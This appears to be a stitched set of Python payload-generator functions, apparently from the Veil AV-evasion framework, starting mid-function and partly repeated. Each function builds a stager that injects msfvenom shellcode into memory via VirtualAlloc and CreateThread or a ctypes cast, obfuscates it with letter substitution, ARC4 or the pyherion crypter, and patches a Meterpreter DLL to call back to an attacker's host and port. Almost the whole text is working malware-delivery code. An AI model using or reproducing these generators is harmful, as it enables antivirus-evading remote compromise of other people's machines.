ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = crypters.pyherion(payload_code) return payload_code else: #Additional random variable names rand_reverse_shell = randomizer.randomString() rand_memory_shell = randomizer.randomString() rand_shellcode = randomizer.randomString() # Create Payload File payload_code = 'from ctypes import *\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans('+ rand_decoded_letter +', '+ rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"'+ Shellcode.translate(sub_scheme) +'\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n' payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n' payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n' payload_code += rand_shellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = crypters.pyherion(payload_code) return payload_code
def generate(self): if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"): metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll" else: metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll" f = open(metsrvPath, "rb") meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :] # patch the metsrv.dll header headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0" headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0" headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00" meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTPS\x00" meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = ( "https://" + self.required_options["LHOST"][0] + ":" + str(self.required_options["LPORT"][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00" ) meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661)) expirationTimeout = struct.pack("<I", 604800) meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F)) communicationTimeout = struct.pack("<I", 300) meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = randomizer.randomString() randb64stringName = randomizer.randomString() randVarName = randomizer.randomString() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n" payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n" randVarName = randomizer.randomString() randFuncName = randomizer.randomString() payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n' payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName + "()\n" # VirtualAlloc() injection else: payloadCode += "import ctypes,base64,zlib\n" randInflateFuncName = randomizer.randomString() randb64stringName = randomizer.randomString() randVarName = randomizer.randomString() randPtr = randomizer.randomString() randBuf = randomizer.randomString() randHt = randomizer.randomString() # deflate function payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n" payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n' payloadCode += ( randPtr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + randVarName + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" ) payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n" payloadCode += ( "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + randPtr + ")," + randBuf + ",ctypes.c_int(len(" + randVarName + ")))\n" ) payloadCode += ( randHt + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + randPtr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" ) payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n" if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = crypters.pyherion(payloadCode) return payloadCode
def generate(self): #Random letter substition variables hex_letters = "abcdef" non_hex_letters = "ghijklmnopqrstuvwyz" encode_with_this = random.choice(hex_letters) decode_with_this = random.choice(non_hex_letters) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names subbed_shellcode_variable_name = randomizer.randomString() shellcode_variable_name = randomizer.randomString() rand_ptr = randomizer.randomString() rand_buf = randomizer.randomString() rand_ht = randomizer.randomString() rand_decoded_letter = randomizer.randomString() rand_correct_letter = randomizer.randomString() rand_sub_scheme = randomizer.randomString() # Create Letter Substitution Scheme sub_scheme = string.maketrans(encode_with_this, decode_with_this) # Escaping Shellcode Shellcode = Shellcode.encode("string_escape") if self.required_options["inject_method"][0].lower() == "virtual": # Create Payload File payload_code = 'import ctypes\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n' payload_code += rand_ptr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + shellcode_variable_name + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payload_code += rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n' payload_code += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n' payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = crypters.pyherion(payload_code) return payload_code else: #Additional random variable names rand_reverse_shell = randomizer.randomString() rand_memory_shell = randomizer.randomString() rand_shellcode = randomizer.randomString() # Create Payload File payload_code = 'from ctypes import *\n' payload_code += 'from string import maketrans\n' payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n' payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate( sub_scheme) + '\"\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n' payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n' payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n' payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n' payload_code += rand_shellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": payload_code = crypters.pyherion(payload_code) return payload_code
def generate(self): metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll" f = open(metsrvPath, 'rb') meterpreterDll = f.read() f.close() # lambda function used for patching the metsvc.dll dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):] # patch the metsrv.dll header headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37" headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0" headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00" meterpreterDll = dllReplace(meterpreterDll,0,headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTP\x00" meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = randomizer.randomString() randb64stringName = randomizer.randomString() randVarName = randomizer.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" randVarName = randomizer.randomString() randFuncName = randomizer.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName+"()\n" if self.required_options["use_encrypter"][0].lower() == "y": payloadCode = crypters.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandIV = randomizer.randomString() RandARCKey = randomizer.randomString() RandARCPayload = randomizer.randomString() RandEncShellCodePayload = randomizer.randomString() # Set IV Value and ARC Key iv = randomizer.randomKey(8) ARCKey = randomizer.randomKey(8) # Create DES Object and encrypt our payload arc4main = ARC4.new(ARCKey) EncShellCode = arc4main.encrypt(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode else: # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandIV = randomizer.randomString() RandARCKey = randomizer.randomString() RandARCPayload = randomizer.randomString() RandEncShellCodePayload = randomizer.randomString() RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Set IV Value and ARC Key iv = randomizer.randomKey(8) ARCKey = randomizer.randomKey(8) # Create DES Object and encrypt our payload arc4main = ARC4.new(ARCKey) EncShellCode = arc4main.encrypt(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'from ctypes import *\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandIV = randomizer.randomString() RandARCKey = randomizer.randomString() RandARCPayload = randomizer.randomString() RandEncShellCodePayload = randomizer.randomString() # Set IV Value and ARC Key iv = randomizer.randomKey(8) ARCKey = randomizer.randomKey(8) # Create DES Object and encrypt our payload arc4main = ARC4.new(ARCKey) EncShellCode = arc4main.encrypt(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'import ctypes\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode else: # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names RandPtr = randomizer.randomString() RandBuf = randomizer.randomString() RandHt = randomizer.randomString() ShellcodeVariableName = randomizer.randomString() RandIV = randomizer.randomString() RandARCKey = randomizer.randomString() RandARCPayload = randomizer.randomString() RandEncShellCodePayload = randomizer.randomString() RandShellcode = randomizer.randomString() RandReverseShell = randomizer.randomString() RandMemoryShell = randomizer.randomString() # Set IV Value and ARC Key iv = randomizer.randomKey(8) ARCKey = randomizer.randomKey(8) # Create DES Object and encrypt our payload arc4main = ARC4.new(ARCKey) EncShellCode = arc4main.encrypt(Shellcode) PayloadCode = 'from Crypto.Cipher import ARC4\n' PayloadCode += 'from ctypes import *\n' PayloadCode += RandIV + ' = \'' + iv + '\'\n' PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n' PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n' PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n' PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = crypters.pyherion(PayloadCode) return PayloadCode